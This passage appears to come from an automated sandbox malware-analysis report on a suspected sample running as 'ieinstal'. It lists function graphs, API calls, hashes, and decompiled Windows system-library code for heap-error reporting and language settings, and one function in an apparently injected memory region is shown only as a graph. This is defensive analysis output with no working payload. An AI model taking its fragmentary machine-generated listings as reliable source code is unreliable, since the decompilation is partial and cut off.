                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: bd67a2224ae224727200c88628e69b038572fc4256323895ea0d56f717e76805
                                                            • Instruction ID: f218c5c7ecd18f30b7e53f29c4be37edb1b467df03c6ea97bc5f1edeaff21648
                                                            • Opcode Fuzzy Hash: bd67a2224ae224727200c88628e69b038572fc4256323895ea0d56f717e76805
                                                            • Instruction Fuzzy Hash: ED900265211002130105A55A0B0450B055657D57993E1C121F2005510CEA6188A1A161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 30 1ec99910-1ec9991c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 701ba6c2360859bed416b97b4bacc147c380ae4d1dc7bc073ddb998218aed019
                                                            • Instruction ID: d127cfb91bcfd9bc1349c3852d0533e4164ac7be4e67408d154ed7b6e3937256
                                                            • Opcode Fuzzy Hash: 701ba6c2360859bed416b97b4bacc147c380ae4d1dc7bc073ddb998218aed019
                                                            • Instruction Fuzzy Hash: 089002B120100613D140715A480474A051557D0749FE1C111E6054514E9A998DD5B6A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02CD6316 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 2cd6316-2cd6317 1 2cd631a-2cd633d 0->1 1->1 2 2cd633f-2cd6384 TerminateThread 1->2 3 2cd638f-2cd639d 2->3 4 2cd639f-2cd63a6 3->4 5 2cd6418-2cd642c 3->5 4->5 6 2cd63a8-2cd63ac 4->6 6->5 7 2cd63ae-2cd63b2 6->7 7->5 8 2cd63b4-2cd63b8 7->8 8->5 9 2cd63ba-2cd63be 8->9 9->5 10 2cd63c0-2cd63c4 9->10 10->5 11 2cd63c6-2cd63cf 10->11 11->5 12 2cd63d1-2cd63e2 11->12 13 2cd63e3-2cd63ef 12->13 14 2cd63fa-2cd6415 13->14 15 2cd63f1-2cd63f5 13->15 15->5 16 2cd63f7-2cd63f8 15->16 16->13
                                                            APIs
                                                            • TerminateThread.KERNELBASE(-2C6445DE,74980251), ref: 02CD6384
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.729412069.0000000002CD6000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD6000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_2cd6000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: TerminateThread
                                                            • String ID:
                                                            • API String ID: 1852365436-0
                                                            • Opcode ID: 9a1483eefdcb0e340e1b8c1d3dd1c74f6ea448d43c93e34d5165d4b92773fa57
                                                            • Instruction ID: 6436d2361ae899d63abe23c936f9ca8712459eae142663b1ca94cec7bbcf576c
                                                            • Opcode Fuzzy Hash: 9a1483eefdcb0e340e1b8c1d3dd1c74f6ea448d43c93e34d5165d4b92773fa57
                                                            • Instruction Fuzzy Hash: 7931F270514345CFCBB0CF28E488BA677E5BF85314F64C2A6C1188F26AC738DA84DB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC9967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 17 1ec9967a-1ec9967f 18 1ec9968f-1ec99696 LdrInitializeThunk 17->18 19 1ec99681-1ec99688 17->19
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 93783b8cc25ef841f45a37794ff311858c9ab3253283ad0195b2463e6b692de8
                                                            • Instruction ID: a2fd0010325e4b658c303e57689112eb7b70ddd04b5188ab8800029e9b9e2cc2
                                                            • Opcode Fuzzy Hash: 93783b8cc25ef841f45a37794ff311858c9ab3253283ad0195b2463e6b692de8
                                                            • Instruction Fuzzy Hash: 17B09B729014C7D6D741D7654E0871F7E1177D0745F66C151D2020641E4778C0D1F5B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 1ED0B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            • The resource is owned exclusively by thread %p, xrefs: 1ED0B374
                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 1ED0B2DC
                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 1ED0B484
                                                            • read from, xrefs: 1ED0B4AD, 1ED0B4B2
                                                            • The critical section is owned by thread %p., xrefs: 1ED0B3B9
                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1ED0B38F
                                                            • Go determine why that thread has not released the critical section., xrefs: 1ED0B3C5
                                                            • *** Inpage error in %ws:%s, xrefs: 1ED0B418
                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 1ED0B47D
                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 1ED0B323
                                                            • *** then kb to get the faulting stack, xrefs: 1ED0B51C
                                                            • *** enter .exr %p for the exception record, xrefs: 1ED0B4F1
                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 1ED0B314
                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 1ED0B305
                                                            • <unknown>, xrefs: 1ED0B27E, 1ED0B2D1, 1ED0B350, 1ED0B399, 1ED0B417, 1ED0B48E
                                                            • The resource is owned shared by %d threads, xrefs: 1ED0B37E
                                                            • a NULL pointer, xrefs: 1ED0B4E0
                                                            • an invalid address, %p, xrefs: 1ED0B4CF
                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 1ED0B352
                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 1ED0B53F
                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1ED0B3D6
                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 1ED0B39B
                                                            • *** enter .cxr %p for the context, xrefs: 1ED0B50D
                                                            • This failed because of error %Ix., xrefs: 1ED0B446
                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 1ED0B2F3
                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 1ED0B48F
                                                            • The instruction at %p tried to %s , xrefs: 1ED0B4B6
                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 1ED0B476
                                                            • write to, xrefs: 1ED0B4A6
                                                            • The instruction at %p referenced memory at %p., xrefs: 1ED0B432
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                            • API String ID: 0-108210295
                                                            • Opcode ID: c1a1ea325a22772e5db2da4a9043b2db3da5076f169e1f1d3a2ae0c689bea18a
                                                            • Instruction ID: d740afb67fe46417567a83e60a147e14fa5c4cffb29732ddefb001da354c6a1b
                                                            • Opcode Fuzzy Hash: c1a1ea325a22772e5db2da4a9043b2db3da5076f169e1f1d3a2ae0c689bea18a
                                                            • Instruction Fuzzy Hash: B18124B9914110FFDB21AF06CC84EAB3F36EF56669F550784F8052B212EB21D561CBB2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED11C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 44%
                                                            			E1ED11C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x1ec348a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E1EC5B150();
				} else {
					E1EC5B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x1ed4589c);
				E1EC5B150("Heap error detected at %p (heap handle %p)\n",  *0x1ed458a0);
				_t27 =  *0x1ed45898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M1ED11E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E1EC5B150();
				} else {
					E1EC5B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E1EC5B150("Error code: %d - %s\n",  *0x1ed45898);
				_t113 =  *0x1ed458a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1EC5B150();
					} else {
						E1EC5B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1EC5B150("Parameter1: %p\n",  *0x1ed458a4);
				}
				_t115 =  *0x1ed458a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1EC5B150();
					} else {
						E1EC5B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1EC5B150("Parameter2: %p\n",  *0x1ed458a8);
				}
				_t117 =  *0x1ed458ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1EC5B150();
					} else {
						E1EC5B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1EC5B150("Parameter3: %p\n",  *0x1ed458ac);
				}
				_t119 =  *0x1ed458b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1EC5B150();
					} else {
						E1EC5B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x1ed458b4);
					E1EC5B150("Last known valid blocks: before - %p, after - %p\n",  *0x1ed458b0);
				} else {
					_t120 =  *0x1ed458b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E1EC5B150();
				} else {
					E1EC5B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E1EC5B150("Stack trace available at %p\n", 0x1ed458c0);
			}











                                                            0x1ed11c10
                                                            0x1ed11c16
                                                            0x1ed11c1e
                                                            0x1ed11c3d
                                                            0x1ed11c3e
                                                            0x1ed11c20
                                                            0x1ed11c35
                                                            0x1ed11c3a
                                                            0x1ed11c44
                                                            0x1ed11c55
                                                            0x1ed11c5a
                                                            0x1ed11c65
                                                            0x1ed11c67
                                                            0x00000000
                                                            0x1ed11c6e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed11c67
                                                            0x1ed11cdc
                                                            0x1ed11ce5
                                                            0x1ed11d04
                                                            0x1ed11d05
                                                            0x1ed11ce7
                                                            0x1ed11cfc
                                                            0x1ed11d01
                                                            0x1ed11d0b
                                                            0x1ed11d17
                                                            0x1ed11d1f
                                                            0x1ed11d25
                                                            0x1ed11d30
                                                            0x1ed11d4f
                                                            0x1ed11d50
                                                            0x1ed11d32
                                                            0x1ed11d47
                                                            0x1ed11d4c
                                                            0x1ed11d61
                                                            0x1ed11d67
                                                            0x1ed11d68
                                                            0x1ed11d6e
                                                            0x1ed11d79
                                                            0x1ed11d98
                                                            0x1ed11d99
                                                            0x1ed11d7b
                                                            0x1ed11d90
                                                            0x1ed11d95
                                                            0x1ed11daa
                                                            0x1ed11db0
                                                            0x1ed11db1
                                                            0x1ed11db7
                                                            0x1ed11dc2
                                                            0x1ed11de1
                                                            0x1ed11de2
                                                            0x1ed11dc4
                                                            0x1ed11dd9
                                                            0x1ed11dde
                                                            0x1ed11df3
                                                            0x1ed11df9
                                                            0x1ed11dfa
                                                            0x1ed11e00
                                                            0x1ed11e0a
                                                            0x1ed11e13
                                                            0x1ed11e32
                                                            0x1ed11e33
                                                            0x1ed11e15
                                                            0x1ed11e2a
                                                            0x1ed11e2f
                                                            0x1ed11e39
                                                            0x1ed11e4a
                                                            0x1ed11e02
                                                            0x1ed11e02
                                                            0x1ed11e08
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed11e08
                                                            0x1ed11e5b
                                                            0x1ed11e7a
                                                            0x1ed11e7b
                                                            0x1ed11e5d
                                                            0x1ed11e72
                                                            0x1ed11e77
                                                            0x1ed11e95

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                            • API String ID: 0-2897834094
                                                            • Opcode ID: a1334755b8964fbfbca1aa1f482db7419c5be57182b56369d9075deaa13e6561
                                                            • Instruction ID: 094235e7ead9b7f1889528a2bd955db5f0293368c390b13cc3c853c1847a3fa1
                                                            • Opcode Fuzzy Hash: a1334755b8964fbfbca1aa1f482db7419c5be57182b56369d9075deaa13e6561
                                                            • Instruction Fuzzy Hash: 646138361181A8CFC7418BB6ED88E65B7E5EF00530B56836AF8095FB41CB31AC818F5E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC63D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E1EC63D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E1EC61B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E1EC61B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E1EC61B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E1EC61B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E1EC61B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L1EC74620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E1EC9F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E1ECA1370(_t276, 0x1ec34e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E1EC9BB40(0,  &_v68, _t170);
									if(L1EC643C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E1EC9BB40(_t257,  &_v68, _t243);
								if(L1EC643C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E1ECA1370(_t278, 0x1ec34e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L1EC74620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E1EC9F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E1ECA1370(_v16, 0x1ec34e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E1EC9BB40(_t262,  &_v68, _t244);
								if(L1EC643C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E1ECA1370(_t282, 0x1ec34e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E1EC9BB40(_t262,  &_v68, _t201);
							if(L1EC643C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L1EC74620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E1EC9F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E1ECA1370(_t280, 0x1ec34e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E1EC9BB40(_t267,  &_v68, _t245);
							if(L1EC643C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E1ECA1370(_t284, 0x1ec34e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E1EC9BB40(_t267,  &_v68, _t224);
						if(L1EC643C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                            0x1ec63d3c
                                                            0x1ec63d42
                                                            0x1ec63d44
                                                            0x1ec63d46
                                                            0x1ec63d49
                                                            0x1ec63d4c
                                                            0x1ec63d4f
                                                            0x1ec63d52
                                                            0x1ec63d55
                                                            0x1ec63d58
                                                            0x1ec63d5b
                                                            0x1ec63d5f
                                                            0x1ec63d61
                                                            0x1ec63d66
                                                            0x1ecb8213
                                                            0x1ecb8218
                                                            0x1ec64085
                                                            0x1ec64088
                                                            0x1ec6408e
                                                            0x1ec64094
                                                            0x1ec6409a
                                                            0x1ec640a0
                                                            0x1ec640a6
                                                            0x1ec640a9
                                                            0x1ec640af
                                                            0x1ec640b6
                                                            0x1ec640bd
                                                            0x1ec640bd
                                                            0x1ec63d83
                                                            0x1ecb821f
                                                            0x1ecb8229
                                                            0x1ecb8238
                                                            0x1ecb8238
                                                            0x1ecb823d
                                                            0x1ecb823d
                                                            0x1ec63da0
                                                            0x1ec63daf
                                                            0x1ec63db5
                                                            0x1ec63dba
                                                            0x1ec63dba
                                                            0x1ec63dd4
                                                            0x1ec63e94
                                                            0x1ec63eab
                                                            0x1ec63f6d
                                                            0x1ec63f84
                                                            0x1ec6406b
                                                            0x1ec6406b
                                                            0x1ec6406e
                                                            0x1ec6406e
                                                            0x1ec64070
                                                            0x1ec64074
                                                            0x1ecb8351
                                                            0x1ecb8351
                                                            0x1ec6407a
                                                            0x1ec6407f
                                                            0x1ecb835d
                                                            0x1ecb8370
                                                            0x1ecb8377
                                                            0x1ecb8379
                                                            0x1ecb837c
                                                            0x1ecb837c
                                                            0x1ecb835d
                                                            0x00000000
                                                            0x1ec6407f
                                                            0x1ec63f8a
                                                            0x1ec63f8d
                                                            0x1ec63f90
                                                            0x1ec63f95
                                                            0x1ecb830d
                                                            0x1ecb830f
                                                            0x1ec63f9b
                                                            0x1ec63fac
                                                            0x1ec63fae
                                                            0x1ec63fb1
                                                            0x1ec63fb1
                                                            0x1ec63fb6
                                                            0x1ecb8317
                                                            0x1ecb831a
                                                            0x00000000
                                                            0x1ec63fbc
                                                            0x1ec63fc1
                                                            0x1ec63fc9
                                                            0x1ec63fd7
                                                            0x1ec63fda
                                                            0x1ec63fdd
                                                            0x1ec64021
                                                            0x1ec64021
                                                            0x1ec64029
                                                            0x1ec64030
                                                            0x1ec64044
                                                            0x1ec64046
                                                            0x1ec64046
                                                            0x1ec64044
                                                            0x1ec64049
                                                            0x1ecb8327
                                                            0x1ecb8334
                                                            0x1ecb8339
                                                            0x1ecb833c
                                                            0x1ec6404f
                                                            0x1ec6404f
                                                            0x1ec6404f
                                                            0x1ec64051
                                                            0x1ec64056
                                                            0x1ec64063
                                                            0x1ec64063
                                                            0x1ec64068
                                                            0x00000000
                                                            0x1ec64068
                                                            0x1ec63fdf
                                                            0x1ec63fe2
                                                            0x1ec63fe4
                                                            0x1ec63fe7
                                                            0x1ec63fef
                                                            0x1ec64003
                                                            0x1ec64005
                                                            0x1ec64005
                                                            0x1ec6400c
                                                            0x1ec64013
